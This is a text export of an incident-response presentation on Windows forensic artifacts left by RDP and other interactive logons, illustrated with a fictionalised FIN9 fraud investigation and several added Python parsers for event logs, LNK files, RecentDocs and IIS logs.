Malware on workstations is annoying enough, but when an attacker accesses your systems using Remote Desktop or other interactive software, you feel downright violated.
The presentation includes a technical dive into forensic artifacts generated during interactive logon sessions with multiple examples from real-life investigations. The presentation covers well known artifacts including MuiCache, UserAssist, and Windows Recycler, but also explores lesser known artifacts including the RDP Bitmap Cache, the Windows 10 Timeline, and Jumplists.
Speaker Bio:
Phillip Kealy is the Senior Manager for Incident Response for the Mandiant Denver and Phoenix offices and provides emergency services to clients when a security breach occurs. With over 15 years of experience in both private and public sector environments, Mr. Kealy has a background in incident response, security architecture, and networking.
2. 2
Overview
§ Background
§ Disclaimer
§ Presentation Goals
§ Interactive Artifact Overview
§ Case Study + Interactive Artifacts
§ Scaling Investigations using Interactive Artifacts
3. 3
Background
§ Who am I?
§ Career
- Operational
- CIRT
- Security Manager
- Consulting
4. 4
DISCLAIMER
Case studies and examples are drawn from our
experiences and activities working for a variety of
customers, and do not represent our work for any
one customer or set of customers.
In many cases, facts have been changed to obscure
the identity of our customers and individuals
associated with our customers.
5. 5
Presentation Goals
§ Define Methods for Interactive Logons
§ Provide overview of available artifacts
§ Methods to combine multiple evidence sources into an in-depth story of the session
6. 6
What are Interactive artifacts?
§ Forensic Artifacts that record user activity during an interactive logon session
§ Examples of interactive logon sessions:
- Physically at the keyboard
- Remote Desktop
- Third Party Utilities
• ScreenConnect
• VNC
• More
- PsExec
7. 7
User Profiles
What happens upon a user's first interactive logon?
§ Log entries (more on this shortly)
§ Creation of the user profile
- "C:\Users\%USERNAME%"
- User registry hives (NTUSER.DAT in the profile root, UsrClass.dat under AppData\Local\Microsoft\Windows)
§ A user profile can prove an interactive logon occurred, even without event log evidence: the creation time of the profile folder is the first logon that loaded the profile
§ Caveat: a profile is also created by non-interactive logons that load the profile (a scheduled task, a service, or "runas" running as that account), so confirm the logon type from other artifacts before calling it interactive
[Diagram: frank -> RDP -> ITJumpServer; "C:\Users\frank\*" created on ITJumpServer]
8. 8
Case Study – FIN9
§ Financially Motivated Attacker
§ Uses minimal malware for initial access and to
maintain presence
§ Exploits business processes and systems for
financial gain
9. 9
Targeted Attack Lifecycle – FIN9
[Diagram: tools and techniques laid out along the attack lifecycle; the phase labels did not survive the export]
• Phishing email
• Word document with macros
• Netwire
• TeamViewer
• ScreenConnect
• EMCO
• Dameware
• NanoCore
• Mimikatz
• Keystroke logging
• Fake logon screen
• Sticky Keys
• Built-in Windows utilities
• Net commands
• File shares
• Search for systems of interest
• Legitimate access to apps
• Direct DB access using 1ClickDB
• Remote Desktop
• File shares
• Netwire
• TeamViewer
• ScreenConnect
• EMCO
• Soft-token certificate theft
11. 11
Initial Lead
§ Fraud department located unauthorized gift cards issued on January 22, 2019
§ Suspicious rewards database interaction on January 22, 2019 traced back to WebServerA
§ Live response analysis indicated attacker installed 1ClickDB via a remote desktop logon session
on WebServerA using Domain Admin account Frank
- RDP session to install 1ClickDB occurred on January 19, 2019 between 03:44:56 UTC and 04:55:56 UTC
from a system at an unknown IP address
§ IIS web server logs on WebServerA recorded access to 1ClickDB from the IP address of
ITJumpServer
- Connections to 1ClickDB webpage occurred on January 22, 2019 between 01:45:33 UTC and 02:30:12
UTC
§ Now what?
- Live response analysis of WebServerA
12. 12
Windows Logon Events
Type 2 – Interactive
- Physical console
- Screen sharing
- "RunAs"
- PsExec (when run with explicit -u/-p credentials; without them the target only sees a Type 3 network logon)
Type 10 – Remote Interactive
- Remote Desktop / Terminal Services
Type 7 – Unlock: credentials used to unlock the screen (also generated when a disconnected RDP session is reconnected)
Type 11 – Cached interactive: console logon with cached domain credentials (no domain controller reachable)
Type 12 – Cached remote interactive
Type 13 – Cached unlock
Note: with Network Level Authentication enabled, an RDP logon is normally preceded by a Type 3 (network) 4624 for the same account; the Type 10 event is the one that carries the session.
13. 13
Type 10 Logon – RDP
[Diagram: unknown system -> ITJumpServer -> RDP -> target, authenticated by the "Rewards" domain controller; recorded on the target in the Security event log as EID 4624]
An account was successfully logged on.
User Name: franktheadmin
Domain: Rewards
Logon ID: (0x0,0x151F248)
Logon Type: 10
Logon Process: User32
Authentication Package: Negotiate
Workstation Name: ITJumpServer
Source Network Address: 192.168.1.101
For a Type 10 event, Workstation Name and Source Network Address identify the RDP client (here ITJumpServer at 192.168.1.101, not the system behind it); the Logon ID ties this logon to its 4634/4647 logoff and to other events of the same session. Because the domain account authenticated through Negotiate (Kerberos or NTLM), the domain controller's 4768/4769 or 4776 events can corroborate the logon.
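The classification above, as an added example that is not part of the presentation: it parses Security events exported as XML, keeps only the interactive logon types, pairs each 4624 with its 4634/4647 by Logon ID, and flags a Type 10 logon whose source is the loopback address (the signature of RDP reaching the host through a local tunnel, which the FIN9 case study comes back to later). The three events are constructed for the example; the EventData field names are the real ones used by Microsoft-Windows-Security-Auditing.

```python
"""Classify Security-log 4624 logon events by logon type and pair them with logoffs.

Added example, not code from the presentation. The records below are
constructed to mimic Windows Security event XML (as exported by wevtutil or
Get-WinEvent). The EventData names used (TargetUserName, TargetDomainName,
TargetLogonId, LogonType, WorkstationName, IpAddress) are the real field
names of Microsoft-Windows-Security-Auditing events.
"""
import xml.etree.ElementTree as ET
from datetime import datetime, timezone

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# Logon types that imply a person driving a session (the "interactive" set).
INTERACTIVE_TYPES = {
    2: "Interactive (console, screen sharing, RunAs, PsExec)",
    7: "Unlock",
    10: "RemoteInteractive (RDP / Terminal Services)",
    11: "CachedInteractive",
    12: "CachedRemoteInteractive",
    13: "CachedUnlock",
}
LOOPBACK = {"127.0.0.1", "::1"}


def _event(event_id, when, **data):
    """Build a constructed Security event in the real XML schema (sample data only)."""
    fields = "".join(f'<Data Name="{k}">{v}</Data>' for k, v in data.items())
    return (f'<Event xmlns="{NS["e"]}"><System><EventID>{event_id}</EventID>'
            f'<TimeCreated SystemTime="{when}"/><Computer>WebServerA</Computer></System>'
            f'<EventData>{fields}</EventData></Event>')


SAMPLE_EVENTS = [
    _event(4624, "2019-01-22T01:33:23.000Z", TargetUserName="dave", TargetDomainName="REWARDS",
           TargetLogonId="0x151f248", LogonType="10", WorkstationName="ITJumpServer",
           IpAddress="192.168.1.101"),
    # Network logon (NLA pre-authentication / SMB): not interactive, must be filtered out.
    _event(4624, "2019-01-22T01:33:22.000Z", TargetUserName="dave", TargetDomainName="REWARDS",
           TargetLogonId="0x151f1a0", LogonType="3", WorkstationName="ITJumpServer",
           IpAddress="192.168.1.101"),
    # RDP arriving over a local SSH tunnel shows the loopback address as its source.
    _event(4624, "2019-01-23T04:10:05.000Z", TargetUserName="frank", TargetDomainName="REWARDS",
           TargetLogonId="0x1a2b3c", LogonType="10", WorkstationName="WEBSERVERA",
           IpAddress="127.0.0.1"),
    _event(4634, "2019-01-22T02:39:45.000Z", TargetUserName="dave", TargetDomainName="REWARDS",
           TargetLogonId="0x151f248", LogonType="10"),
]


def parse_event(xml_text):
    """Flatten one event into a dict: event_id, time (UTC) and every EventData field."""
    root = ET.fromstring(xml_text)
    rec = {
        "event_id": int(root.find("e:System/e:EventID", NS).text),
        "time": datetime.strptime(root.find("e:System/e:TimeCreated", NS).get("SystemTime"),
                                  "%Y-%m-%dT%H:%M:%S.%fZ").replace(tzinfo=timezone.utc),
    }
    for d in root.iterfind("e:EventData/e:Data", NS):
        rec[d.get("Name")] = d.text
    return rec


def interactive_sessions(xml_events):
    """One record per interactive 4624, with the logoff time when a 4634/4647 matches its Logon ID."""
    sessions, by_logon_id = [], {}
    for rec in sorted(map(parse_event, xml_events), key=lambda r: r["time"]):
        logon_type = int(rec.get("LogonType", 0))
        if rec["event_id"] == 4624 and logon_type in INTERACTIVE_TYPES:
            s = {
                "user": f'{rec["TargetDomainName"]}\\{rec["TargetUserName"]}',
                "logon_id": rec["TargetLogonId"].lower(),
                "logon_type": logon_type,
                "description": INTERACTIVE_TYPES[logon_type],
                "source_host": rec.get("WorkstationName"),
                "source_ip": rec.get("IpAddress"),
                "start": rec["time"],
                "end": None,
                # Loopback source on a Type 10 logon: RDP reached the host over a local tunnel.
                "tunnelled_rdp": logon_type == 10 and rec.get("IpAddress") in LOOPBACK,
            }
            sessions.append(s)
            by_logon_id[s["logon_id"]] = s
        elif rec["event_id"] in (4634, 4647):
            s = by_logon_id.get(rec.get("TargetLogonId", "").lower())
            if s is not None:
                s["end"] = rec["time"]
    return sessions


if __name__ == "__main__":
    for s in interactive_sessions(SAMPLE_EVENTS):
        dur = (s["end"] - s["start"]) if s["end"] else None
        print(f'{s["start"]:%Y-%m-%d %H:%M:%S} type {s["logon_type"]:>2} {s["user"]:<16} '
              f'from {s["source_host"]}/{s["source_ip"]} duration={dur} tunnel={s["tunnelled_rdp"]}')
```

The session duration that comes out (dave, 01:33:23 to 02:39:45) is the window every other artifact on the following slides has to fall inside; a Type 10 logon without a matching logoff is either still open at collection time or was ended by a crash or log rollover.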
15. 15
User Registry Hives
Registry Hive Path               Registry File on Disk (Windows Vista/2008+)
HKEY_USERS\<User SID>            \Users\<username>\NTUSER.DAT
HKEY_USERS\<User SID>_Classes    \Users\<username>\AppData\Local\Microsoft\Windows\UsrClass.dat
16. 16
LNK Files
§ Windows shortcut files
§ Auto-generated when a file is opened through the shell (Explorer, and any application that uses the common open/save dialogs); the user never sees most of them
§ Supports "Recent Files" / "Recent Docs" functionality
Windows Vista, 7, Server 2008 and later – LNK File Paths
C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Recent
C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Office\Recent
17. 17
Data within LNK Files
§ Full file path (local or network) of the target
§ Attributes and logical size of the target
§ MAC timestamps of the target as they were when the LNK was last written (i.e. when the file was last opened through the shell); the LNK file's own filesystem timestamps record when the shortcut itself was first and last written
§ Caveat: the embedded data describes the target, so a LNK outlives a deleted or renamed file and still documents its original path, size and times
§ Example output from "lnkparse.py" (sourceforge.net/projects/jafat/files/lnk-parse/)
18. 18
LNK File of interest
Date & Time           Timestamp                      File Name
2019-01-22 01:39:23   Created                        C:\Users\dave\AppData\Roaming\Microsoft\Windows\Recent\result.txt.lnk
2019-01-22 01:36:23   Created, Modified, Accessed    C:\Users\dave\Desktop\result.txt
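A minimal parser for the fields just listed, as an added example (not code from the presentation and not lnkparse.py): it reads the 76-byte ShellLinkHeader for the target's MAC times, size and attributes, the LocalBasePath out of the LinkInfo block, and the StringData strings, following the public [MS-SHLLINK] layout. Because a real .lnk cannot be embedded here, build_lnk() constructs one in memory; the path, size and timestamps it uses are made up to resemble the case study.

```python
"""Parse the forensically useful fields of a Windows shell link (.lnk):
target MAC timestamps and size (ShellLinkHeader), local base path (LinkInfo)
and the StringData strings.

Added example, not from the presentation or from lnkparse.py. Layout follows
the public [MS-SHLLINK] specification. The sample .lnk is constructed in
memory by build_lnk(); its names, size and times are made up.
"""
import struct
from datetime import datetime, timedelta, timezone

LNK_CLSID = bytes.fromhex("0114020000000000C000000000000046")   # {00021401-0000-0000-C000-000000000046}
HEADER_FMT = "<I16sIIQQQIIIHHII"                                # 76-byte ShellLinkHeader
HAS_ID_LIST, HAS_LINK_INFO, IS_UNICODE = 0x01, 0x02, 0x80
STRING_FIELDS = [(0x04, "name"), (0x08, "relative_path"), (0x10, "working_dir"),
                 (0x20, "arguments"), (0x40, "icon_location")]   # StringData order in the file
ATTRS = {0x01: "READONLY", 0x02: "HIDDEN", 0x04: "SYSTEM", 0x10: "DIRECTORY", 0x20: "ARCHIVE"}
FT_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def filetime_to_dt(ft):
    return FT_EPOCH + timedelta(microseconds=ft // 10)


def dt_to_filetime(dt):
    return ((dt - FT_EPOCH) // timedelta(microseconds=1)) * 10


def _utf16_string(s):
    return struct.pack("<H", len(s)) + s.encode("utf-16-le")


def _link_info(local_path, serial=0x1234ABCD):
    """LinkInfo with VolumeID + LocalBasePath (flag 0x1); offsets are relative to LinkInfo start."""
    label = b"OS\x00"
    volume_id = struct.pack("<IIII", 16 + len(label), 3, serial, 16) + label   # DRIVE_FIXED = 3
    base_path = local_path.encode("cp1252") + b"\x00"
    hdr = 0x1C
    body = volume_id + base_path + b"\x00"                                     # empty CommonPathSuffix
    return struct.pack("<IIIIIII", hdr + len(body), hdr, 1, hdr, hdr + len(volume_id), 0,
                       hdr + len(volume_id) + len(base_path)) + body


def build_lnk(target, size, mtime, relative_path, working_dir):
    """Constructed sample: a Recent-folder style link with LinkInfo, RelativePath and WorkingDir."""
    flags = HAS_LINK_INFO | IS_UNICODE | 0x08 | 0x10
    ft = dt_to_filetime(mtime)
    header = struct.pack(HEADER_FMT, 0x4C, LNK_CLSID, flags, 0x20, ft, ft, ft, size, 0, 1, 0, 0, 0, 0)
    return header + _link_info(target) + _utf16_string(relative_path) + _utf16_string(working_dir)


def parse_lnk(data):
    f = struct.unpack_from(HEADER_FMT, data, 0)
    hdr_size, clsid, flags, attrs, ctime, atime, wtime, file_size = f[:8]
    if hdr_size != 0x4C or clsid != LNK_CLSID:
        raise ValueError("not a shell link file")
    rec = {"target_created": filetime_to_dt(ctime), "target_accessed": filetime_to_dt(atime),
           "target_modified": filetime_to_dt(wtime), "target_size": file_size,
           "attributes": [n for b, n in ATTRS.items() if attrs & b], "target_path": None}
    off = 0x4C
    if flags & HAS_ID_LIST:                                   # skip the shell item ID list
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINK_INFO:
        li_size, _hdr, li_flags, _vol, base_off, _net, _suffix = struct.unpack_from("<IIIIIII", data, off)
        if li_flags & 0x1:                                    # VolumeIDAndLocalBasePath
            start = off + base_off
            rec["target_path"] = data[start:data.index(b"\x00", start)].decode("cp1252")
        # flag 0x2 (network share target) is in CommonNetworkRelativeLink; not decoded here
        off += li_size
    for bit, name in STRING_FIELDS:
        if flags & bit:
            count = struct.unpack_from("<H", data, off)[0]
            off += 2
            width = 2 if flags & IS_UNICODE else 1
            rec[name] = data[off:off + count * width].decode("utf-16-le" if width == 2 else "cp1252")
            off += count * width
    return rec


SAMPLE_LNK = build_lnk(r"C:\Users\dave\Desktop\result.txt", 1234,
                       datetime(2019, 1, 22, 1, 36, 23, tzinfo=timezone.utc),
                       r"..\..\..\..\..\Desktop\result.txt", r"C:\Users\dave\Desktop")

if __name__ == "__main__":
    for k, v in parse_lnk(SAMPLE_LNK).items():
        print(f"{k:16} {v}")
```

On a real link the VolumeID also carries the drive serial number and label, which is how a LNK pointing at a removable drive can be matched to USB artifacts; network targets live in the CommonNetworkRelativeLink structure that this example leaves undecoded.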
19. 19
Most Recently Used (MRU) Keys
"RecentDocs" – recently opened files; one subkey per file extension (.ini, .pem, .txt, .doc, .rdg, .zip, Folder, etc.)
HKEY_USERS\{SID}\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs
§ Binary format: each numbered value holds the file name (UTF-16LE) followed by a shell item; the MRUListEx value gives the order, most recent first
§ Each extension subkey stores the most recent 10 opened files; the parent RecentDocs key keeps a longer combined list
§ The subkey's last-write time is the time the most recent (position 0) entry was written
Key Last Write        Registry Key                                                          Parsed MRU Value
2019-01-22 01:36:23   Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.txt    0 = result.txt
2019-01-22 01:35:34   Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.zip    0 = omg.zip
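The ordering step that produces "0 = result.txt", as an added example that is not part of the presentation: it decodes MRUListEx (little-endian DWORD indexes terminated by 0xFFFFFFFF) and pulls the UTF-16LE file name off the front of each numbered value. The value blobs are constructed to match that layout; the shell item that follows the name is simplified, since only the name is needed here.

```python
"""Order the RecentDocs entries of one extension subkey by MRUListEx.

Added example, not from the presentation. The value blobs are constructed
to match the on-disk layout: MRUListEx is a list of little-endian DWORD
indexes ending with 0xFFFFFFFF (most recent first); each numbered value
starts with the file name in UTF-16LE terminated by a double NUL, followed
by a shell item that references the matching .lnk in the Recent folder.
"""
import struct


def _entry(name, lnk_name):
    """Constructed RecentDocs value: UTF-16LE name, double NUL, then a simplified shell item."""
    item = lnk_name.encode("cp1252") + b"\x00"
    return name.encode("utf-16-le") + b"\x00\x00" + struct.pack("<H", len(item) + 2) + item


SAMPLE_TXT_SUBKEY = {                       # HKEY_USERS\{SID}\...\RecentDocs\.txt (constructed)
    "MRUListEx": struct.pack("<4I", 2, 0, 1, 0xFFFFFFFF),
    "0": _entry("notes.txt", "notes.lnk"),
    "1": _entry("hosts.txt", "hosts.lnk"),
    "2": _entry("result.txt", "result.txt.lnk"),
    "3": _entry("orphan.txt", "orphan.lnk"),   # not referenced by MRUListEx: stale slot, flag it
}


def parse_mrulistex(blob):
    """Indexes in MRU order; stops at the 0xFFFFFFFF terminator."""
    count = len(blob) // 4
    order = []
    for idx in struct.unpack(f"<{count}I", blob[:count * 4]):
        if idx == 0xFFFFFFFF:
            break
        order.append(idx)
    return order


def entry_name(blob):
    """File name = UTF-16LE prefix up to the first aligned double NUL."""
    pos = 0
    while pos + 1 < len(blob) and blob[pos:pos + 2] != b"\x00\x00":
        pos += 2
    return blob[:pos].decode("utf-16-le")


def recent_docs(subkey):
    """(rank, value index, file name) in MRU order, plus indexes of values not in the list."""
    order = parse_mrulistex(subkey["MRUListEx"])
    listed = [(rank, idx, entry_name(subkey[str(idx)])) for rank, idx in enumerate(order)]
    stale = sorted(int(k) for k in subkey if k != "MRUListEx" and int(k) not in order)
    return listed, stale


if __name__ == "__main__":
    listed, stale = recent_docs(SAMPLE_TXT_SUBKEY)
    for rank, idx, name in listed:
        print(f"{rank}: value {idx} -> {name}")
    print("stale slots (not referenced by MRUListEx):", stale)
```

Only the rank-0 entry can be tied to the subkey's last-write time; the other entries are known to have been opened earlier, but their individual times have to come from the matching .lnk files in the Recent folder.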
20. 20
Anatomy of a Registry Key
Example: Run key
Key: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Value Name: NotMalware
Value Data: C:\ProgramData\TotallyMalware\Evil.exe
21. 21
Anatomy of a Registry Key
Example: Run key
Key Last Modified: 2017-06-05 19:33:51
§ Values have no timestamp of their own; the only time available is the parent key's last-write time, so when a key holds several values the time cannot be attributed to one of them
22. 22
Registry Timestamps
A timestamp is applied to the key, and is updated when:
1) the key is created, 2) a value is created or deleted, 3) the data of any value is modified
Note: registry timestamps can be modified (tools exist that set them through the native registry API), although this is not very common
23. 23
Evidence of Execution
Artifact         Default Enabled     User Agnostic   All Windows Versions   Execution Visibility
ShimCache        Yes                 Yes             Yes                    Yes
AmCache          Yes                 Yes             No                     Yes
UserAssist       Yes                 No              Yes                    GUI only
MUICache         Yes                 No              Yes                    GUI only
Prefetch         Workstations only   Yes             Yes                    Yes
Windows Events   No                  Yes             Yes                    Yes
WMI RUA          No                  Yes             Yes                    Yes
Caveat: ShimCache entries (and AmCache entries on Windows 10) are also created for executables that were merely enumerated or inspected, so treat them as evidence of presence and corroborate execution with Prefetch, UserAssist, or 4688/Sysmon process-creation events.
24. 24
UserAssist and MUICache
Track programs launched through the Windows shell (Explorer); neither records command-line, service, or scheduled-task execution
HKEY_USERS\{SID}\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{GUID}\Count
- {CEBFF5CD-ACE2-4F4F-9178-9926F41749EA} = executables, {F4E57C4B-2036-45F0-A9AB-443BCFE33D9F} = shortcuts (.lnk)
HKEY_USERS\{SID}\Software\Microsoft\Windows\ShellNoRoam\MUICache (Windows XP, in NTUSER.DAT)
HKEY_USERS\{SID}_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache (Vista and later, in UsrClass.dat)
UserAssist
- One value per executable file
  • Value name is ROT13 encoded; paths under system folders are prefixed with a known-folder GUID (e.g. {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7} = %SystemRoot%\System32)
- Number of times each program ran
- Last execution time
MUICache
- One value per executable file
  • Clear-text
- Records "FileDescription" from the PE version resource
- No per-entry timestamp; only the key's last-write time is available
27. 27
Decoded UserAssist Data
Last Executed (decoded)   Registry Value Name (ROT13 decoded)                            Times Executed
2019-01-22 01:36:23       {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\msiexec.exe             1
2019-01-22 01:33:48       {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\ServerManager.exe       1
2019-01-22 01:39:23       C:\Users\dave\Desktop\omg.exe                                  1
2019-01-22 01:43:23       {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\dssite.msc              1
2019-01-22 01:44:56       {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\dsac.exe                1
2019-01-22 02:28:01       {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\mstsc.exe               3
({1AC14E77-02E7-4E5D-B744-2EB1AE5198B7} is the known-folder GUID for %SystemRoot%\System32; the time shown is the last-execution FILETIME stored in each value, not the key's last write, since all values share one Count key)
28. 28
Jump Lists
§ Provides the user quick access to recently used apps and the files or locations opened with them
§ Each user has their own jump lists
§ Shows evidence of accessed resources (path, and for automatic lists a per-entry last-access time from the DestList stream)
§ Two types of jump lists; files are named by an application ID hash, so the application has to be resolved from that ID
§ Requires parsing to be human readable
- JumpListParser, JLECmd, jmp
Automatic   %APPDATA%\Microsoft\Windows\Recent\AutomaticDestinations\*.automaticDestinations-ms
Custom      %APPDATA%\Microsoft\Windows\Recent\CustomDestinations\*.customDestinations-ms
29. 29
Jump Lists
§ Automatic – created automatically when a user interacts with a resource
§ Custom – created when a user "pins" an item
30. 30
Browser History, Cache, and Downloads
§ User Specific Artifact
§ Enumerate Browsers
§ Extract Browsing History
§ Collect Browser Cache
§ Collect Downloaded Files
31. 31
Web Server Side Data - Logging GET vs. POST
GET requests
- "Retrieve" content specified in the request address
- Key-value pairs passed as part of the URI
- Fully captured in logs (cs-uri-query)
POST requests
- Tell the server to accept the data enclosed in the message body
- Key-value pairs passed in the message body
- Request parameters not logged: IIS W3C logging records only the URI stem and whatever query string was on the POST URL (cs-bytes, if enabled, at least reveals the request size)
Impact: malicious activity in POST requests can be hard to detect!
32. 32
Web Server Side Data - Content Encoding
§ Special characters in HTTP requests are URL encoded by the web browser
- % followed by the two-digit hexadecimal value of the byte (e.g. & = %26)
- Spaces can be represented by %20 or + (so a literal + has to be sent as %2B)
- Decode cs-uri-query before searching logs: a search for "Mark Co." will not match "Mark%20Co."
http://www.foo.com/search.aspx?name=John & Mark Co.&op=1
…is converted to (and will be logged as)…
http://www.foo.com/search.aspx?name=John%20%26%20Mark%20Co.&op=1
33. 33
IIS log excerpt – 1ClickDB requests (GET parameters visible in cs-uri-query; the closing POST carries its real parameters in the body and only "nocache" is logged)
GET /images/Browse.asp?sqlorderby_A="log_id"+DESC&sqlfrom_A="dbo"."<SYSTEM>_LOG"
GET /images/Schema.asp
GET /images/Browse.asp?sqlfrom_A="dbo"."<SYSTEM>_USERS"
GET /images/Browse.asp?ocdGridMode_A=Se<SYSTEM>h&sqlfrom_A="dbo"."<SYSTEM>_USERS"
GET /images/Browse.asp?sqlorderby_A=&sqlwhere_A=("email"+Like+'NAME2@EMAIL.com%')&sqlselecthide_A=&sqlpagesize_A=10&sqlfrom_A="dbo"."<SYSTEM>_USERS"
GET /images/Browse.asp?sqlorderby_A=&sqlwhere_A=("last_name"+Like+'NAME%')&sqlselecthide_A=&sqlpagesize_A=10&sqlfrom_A="dbo"."<SYSTEM>_USERS"
GET /images/Edit.asp?sqlid=1989&sqlfrom="dbo"."<SYSTEM>_USERS"&sqlorderby_A=&sqlwhere_A=("last_name"+Like+'NAME%')&sqlpagesize_A=10&sqlselecthide_A=&sqlfrom_A="dbo"."<SYSTEM>_USERS"&
GET /images/Connect.asp
GET /images/Schema.asp
GET /images/Edit.asp?sqlwhere=&sqlid=1989&sqlfrom="dbo"."<SYSTEM>_USERS"&sqlfrom_A="dbo"."<SYSTEM>_USERS"&sqlwhere_A=("email"+Like+'NAME@EMAIL.com%')&sqlpagesize_A=10&sqlorderby_A=&sqlselecthide_A=
GET /images/Browse.asp?sqlfrom_A="dbo"."<SYSTEM>_USERS"
POST /images/Command.asp?nocache=1/8/2017+12:34:10+PM
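Turning lines like these into a record of what the attacker asked the database, as an added example (not code from the presentation): the parser reads the W3C #Fields directive, URL-decodes cs-uri-query (covering the %20 / + / %25 cases from the previous slide), extracts the sql* parameters, and separately flags POSTs, whose parameters never reach the log. The log text is constructed; the field names are real W3C extended-logging names, while the table name (APP_USERS), addresses and the nocache timestamp are made up.

```python
"""Decode the cs-uri-query of IIS W3C log lines and pull out the SQL-bearing
parameters of a database-browsing tool; POSTs are flagged because their
parameters travel in the body and never reach the log.

Added example, not from the presentation. The log text is constructed; the
#Fields line uses real W3C extended field names, while the table name
(APP_USERS), the addresses and the nocache value are made up.
"""
from urllib.parse import parse_qs

SAMPLE_LOG = """#Software: Microsoft Internet Information Services 8.5
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query c-ip cs(User-Agent) sc-status
2019-01-22 01:45:33 10.10.20.5 GET /images/Schema.asp - 192.168.1.101 Mozilla/5.0 200
2019-01-22 01:47:10 10.10.20.5 GET /images/Browse.asp sqlorderby_A=&sqlwhere_A=(%22last_name%22+Like+%27NAME%25%27)&sqlpagesize_A=10&sqlfrom_A=%22dbo%22.%22APP_USERS%22 192.168.1.101 Mozilla/5.0 200
2019-01-22 01:52:41 10.10.20.5 GET /images/Edit.asp sqlid=1989&sqlfrom=%22dbo%22.%22APP_USERS%22 192.168.1.101 Mozilla/5.0 200
2019-01-22 02:30:12 10.10.20.5 POST /images/Command.asp nocache=1/22/2019+2:30:12+AM 192.168.1.101 Mozilla/5.0 200
"""


def parse_w3c(text):
    """One dict per request line, keyed by the names in the #Fields directive, plus decoded params."""
    fields, records = None, []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        parts = line.split(" ", len(fields) - 1)        # W3C logs are space-delimited
        rec = dict(zip(fields, parts))
        query = rec.get("cs-uri-query", "-")
        # parse_qs performs the URL decoding: %22 -> ", + -> space, %25 -> %, %27 -> '
        rec["params"] = {} if query == "-" else {
            k: v[0] for k, v in parse_qs(query, keep_blank_values=True).items()}
        records.append(rec)
    return records


def db_activity(records):
    """Requests that carried SQL fragments, plus POSTs whose parameters were not logged."""
    hits = []
    for r in records:
        sql = {k: v for k, v in r["params"].items() if k.lower().startswith("sql")}
        when = f'{r["date"]} {r["time"]}'
        if sql:
            hits.append({"time": when, "client": r["c-ip"], "page": r["cs-uri-stem"],
                         "table": sql.get("sqlfrom_A") or sql.get("sqlfrom"),
                         "where": sql.get("sqlwhere_A", ""), "logged": True})
        elif r["cs-method"] == "POST":
            hits.append({"time": when, "client": r["c-ip"], "page": r["cs-uri-stem"],
                         "table": None, "where": "", "logged": False})   # body parameters invisible
    return hits


if __name__ == "__main__":
    for h in db_activity(parse_w3c(SAMPLE_LOG)):
        print(h)
```

The decoded where-clause is what you would hand to the fraud team; the unlogged POST to Command.asp is the gap that has to be closed from the other side (database audit logs, or the attacker's own interactive artifacts on the client system).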
34. 34
What do we know so far?
Time                  Source                Details
2019-01-22 01:33:23   EventLog              Remote Desktop Services: User authentication succeeded: User: dave Domain: rewards Source Network Address: 192.168.1.101
2019-01-22 01:33:23   EventLog              Remote Desktop Services: Session logon succeeded: User: rewards\dave Session ID: 2 Source Network Address: 192.168.1.101
2019-01-22 01:35:34   Registry: LastWrite   Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.zip -> omg.zip
2019-01-22 01:39:03   LNK: Create Time      C:\Users\dave\Desktop\results.txt (C:\Users\dave\AppData\Roaming\Microsoft\Windows\Recent\result.txt.lnk)
2019-01-22 01:39:23   $FN: Create Time      C:\Users\dave\AppData\Roaming\Microsoft\Windows\Recent\result.txt.lnk
2019-01-22 01:39:23   Registry: LastWrite   Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.txt -> result.txt
2019-01-22 01:39:23   UserAssist: dave      C:\Users\dave\Desktop\omg.exe
2019-01-22 01:43:23   UserAssist: dave      {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\dssite.msc
2019-01-22 01:44:56   UserAssist: dave      {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\dsac.exe
2019-01-22 01:45:33   IE: BrowserCache      Earliest browser cache artifact created
2019-01-22 02:28:01   UserAssist: dave      {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\mstsc.exe
2019-01-22 02:30:12   IE: BrowserCache      Most recent browser artifact modified
2019-01-22 02:39:45   EventLog              Remote Desktop Services: Session logoff succeeded: User: rewards\dave Session ID: 2
2019-01-22 02:39:45   EventLog              Remote Desktop Services: Session has been disconnected: User: rewards\dave Session ID: 2 Source Network Address: 192.168.1.101
§ What next?
39. 39
RDP Bitmap Cache Files
§ Cache of screen bitmap tiles received during an RDP session, kept so that unchanged regions do not have to be resent
§ Improves user experience
§ Written on the RDP client, not on the server: on an internal jump host it can preserve fragments of what the attacker saw on the systems they connected to from there
§ Located at:
- C:\Users\<username>\AppData\Local\Microsoft\Terminal Server Client\Cache\bcache2.bmc (older mstsc versions)
- C:\Users\<username>\AppData\Local\Microsoft\Terminal Server Client\Cache\Cache[0-9]{4}.bin (newer mstsc versions)
§ Tiles can be extracted and laid out with bmc-tools (github.com/ANSSI-FR/bmc-tools); screen position is not stored, so expect a mosaic to reassemble by hand rather than screenshots
42. 42
Registry Shellbags
§ Windows Explorer usage
§ Records size, position, and view settings of folder windows
§ Provides evidence of user access to local & remote directories, including folders on removable media and network shares that no longer exist
Windows XP (NTUSER.DAT):
HKEY_USERS\{SID}\Software\Microsoft\Windows\Shell
HKEY_USERS\{SID}\Software\Microsoft\Windows\ShellNoRoam
